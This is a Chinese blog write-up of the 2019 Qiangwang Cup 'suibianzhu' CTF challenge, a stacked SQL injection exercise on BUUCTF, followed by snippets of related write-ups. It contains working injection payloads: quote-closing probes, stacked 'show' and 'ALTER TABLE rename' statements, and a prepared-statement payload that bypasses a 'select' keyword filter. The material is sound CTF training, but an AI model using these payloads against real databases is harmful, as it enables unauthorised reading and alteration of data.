[CTF]强网杯2019随便注

最新推荐文章于 2021-10-25 16:42:06 发布
最新推荐文章于 2021-10-25 16:42:06 发布
阅读量308 收藏 1
点赞数
分类专栏: CTF 文章标签: sql injection
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011317663/article/details/120801919
版权

简介

对安全有兴趣,BUUCTF上一道一道做,记一些有意思的东西。

关键点

1 发现注入点

这题很容易实验,最简单的1’ or 1之类的语句可以测出来,闭环单引号就可以。
#注释符号,如果没起作用,需要注意使用url编码。

2 PHP的防注入

发现可以随便注之后,试了union select之类的,也面提示:

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

搜了一圈,没发现可以绕过的方法。

然后尝试多语句,show databases,show tables,一试验可以生效。
这一步给了思路,但同时select又被禁掉了,这个时候思路就很容易跑偏,我就跑偏了,尝试到其它数据库或表中去找一些信息,因为不能用select查询数据,就用show去查一些信息,比如:

show columns from table;
show index from table;
show create database;
show gloable variables;

等等方式, 尝试发现一些线索,但是最终发现,这些方式只是适用于misc类的题目,而不是SQL,最终还是强迫自己从SQL的方向去考虑。

使用show tables时,返回两个表 1919810931114514、 words;
使用show columns from 1919810931114514, 一直无数据返回,也间接导致花了大量时间去找flag在什么地方。当继续SQL方向时,就发现了这个错误,纯数字表名需要加`号括起来

show columns from `1919810931114514`

最终返回列名flag,那剩下的问题就是如何读取出来的问题。

3 解题思路

在一遍遍搜索后,确定除了select没有其它获取表数据的方法,冷静下来,思考其它可以改变数据的方法,比如拷贝数据之类的,但是上面的防注入把update和select也禁掉了,这条路也不通。
最终,想到了alter,可以通过修改表名来间接达到目的。

简单的几步:
alter table words rename as words1;   // 将原查询表改名
alter table `1919810931114514` rename as words; // 将flag所在表改为原查询表
alter table words change flag id varchar(100); // 修改列名

总结

最终拿到flag时并不兴奋,因为在拿到之前就已经很确定这个方法是可行的,同时因为SQL不熟,导致走了很多弯路,这个挫折感抵消了解题的愉悦,慢慢积累吧。

附:

搜到的其它解题方法:

payload:-1';use supersqli;set @sql=concat('s','elect `flag` from `1919810931114514`');PREPARE stmt1 FROM @sql;EXECUTE stmt1;#
delta_hell
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-逆向 Where is your flag write-up
503 Serivice Unavailable
07-25 1285
首先可以看到在我们仅有的文件当中,只有一个OUT为后缀名的文件,通过百度得知,可以用linux系统将这种类型的文件打开。 而运行之后我们发现shell中显示:where is your flag? 关闭窗口,将这个OUT文件拖入IDA中反编译,可以很轻松的找到字符串中有关flag的一条,打开相关函数的伪C代码 int __cdecl main(int argc, const char **...
buuctf web题解之[强网杯 2019]随便1详解,网络安全基础72问
最新发布
2301_78416732的博客
04-03 709
堆叠入mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠入其实就是通过结束符来执行多条sql语句三、解题当我们输入id=1‘的时候,只要他页面有变化,那就是这里可能存在入点但是这里具体是要填id=1‘,还是id=1“,或者是id=1’),那就涉及到闭合方式的判断了。就如上边所说,闭合方式有很多种,我们需要挨个猜常见的闭合方式有成对的’ ‘、” “、( )、(’ ')判断具体是哪种,只能挨个试…直到输入 1’ 页面发生了报错,说明是 ’ 闭
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUUCTF Web [强网杯 2019]随便
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
BUUCTF-强网杯-随便
wuerror的博客
06-30 6493
引用:https://www.cnblogs.com/Mikasa-Ackerman/p/11050033.html 1‘ //首先尝试的加引号,报错了 1’ # //正常 1‘ order by 1 # //用order by 测试得到列数为2 1' union select 1,2 # //回显了过滤规则 return preg_match("/select|update|delete|d...
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
2019领航杯CTF题目
11-25
2019领航杯CTF的原题,文件恢复和DNS两题没有
2018强网CTF-题目整理-校本图片Readme.zip
12-18
2018强网CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── 题目名称:...
2018强网CTF-题目整理.zip
12-17
2018强网CTF___题目整理
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
2022年ctf强网青少年题目
09-16
2022年ctf强网青少年题目
[强网杯 2019]随便
沐目的博客
10-20 841
1知识点 1.1MySQL命令 原来堆叠入竟然真的有用,真的就像这道题所说的,安全和开发缺一不可。很久没用过堆叠入了。复习一下把。 查看所有数据库:0’;show databases;%23 查看当前数据库的表: 1’;show tables;%23 查看某个表的某个字段: 0’;show username from users;%23 把users表名改为user:rename table...
CTF--web学习
qq_45655136的博客
01-08 7709
这是大二上学期主要学习的一些知识,分享一下 一、linux常见命令 Linux切换到超级管理员 sudo su 切换到普通用户 su username touch创建文件 mkdir创建文件夹 mkdir -p ./aaa/bbb/ccc创建aaa/bbb/ccc目录 mv 既可以重命名,又可以移动文件或文件夹 rm -r就是向下递归,不管有多少级目录,一并删除 ​ -f就是直接删除,不作任何提示的 cp拷贝 pwd查看当前目录 ‘>’ '>>'将命令执行结果重定向
BUUCTF [强网杯 2019] 随便
Senimo
03-23 1626
BUUCTF [强网杯 2019] 随便 打开环境: 先输入1查询回显内容: 输入1'测试SQL语句闭合类型: 判断出原SQL闭合方式为:inject='1',查询字段数: 1' union select 11,22 # 产生回显: 屏蔽掉了部分关键字,尝试各种入姿势,直到使用堆叠入: 1';show databases;# 得到了各数据库的名字,再查看表名: 1';show ...
BUUCTF-web类-第二题 [强网杯 2019]随便
weixin_44622228的博客
04-16 628
BUUCTF-web类-第二题 [强网杯 2019]随便 正常输入1,返回一个数组 基本操作,单引号测试下,报错了。 看看 1’ or 1=1 #,发现爆出了所有字段。 常规流程,order by,发现到order by 3#时,报错了,说明该表中只有三个字段。 继续常规流程,联合查询,发现提示竟然过滤了这么多入时常用的关键字,看来事情没有这么简单。 于是我选择了从头再来,看看有没有别的...
关于sql 入 (php)
lianxiangbus
07-31 124
昨天看了些有关sql入的的知识,没想到sql学的好的话可以如此强大,\(^o^)/~,小哥的sql只是皮毛啊,那就只防不攻吧……这些知识全都是网络上搜刮得来的,前人总结非个人的,我把主要的都贴进来供以后学习 PHP入的基本原理 程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对 用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据 库...
buuctf 2019强网随便
devilare的博客
09-26 333
2019强网随便 来到页面发现只是一个提交栏 随意试一下输入1’有回显说明存在sql入,输入万能密码试试1’ or 1=1;#输入1’; union select;#看看能否联合查询一下存在过滤,且没办法通过大小写绕过,好难,看看wp。看来需要堆叠入(ps:堆叠入就是一次性执行多条查询语句) 输入1’;show databases;#查看所有的数据库;en。。。没有和flag有关的字样,再输入1’;show tables;#看看表 ...
BUUCTF[强网杯2019]随便
楼阁de猫的博客
09-23 495
[强网杯2019]随便 知识点:堆叠入 首先先输入一个1’,发现报错,再输入1’#,有回显,再输入1’ order by 2#,1’order by 3#,当输入3的时候发现无回显,说明入点是2,但是当我们输入1’ union select 1,2#时,发现过滤了很多关键字,这时我们就要考虑堆叠入 我们输入1’; 发现下面出现了一条横线 那应该是堆叠入了,(什么是堆叠入呢:在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两
BUUCTF:[GYCTF2020]Blacklist
末初的CSDN博客
11-09 442
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值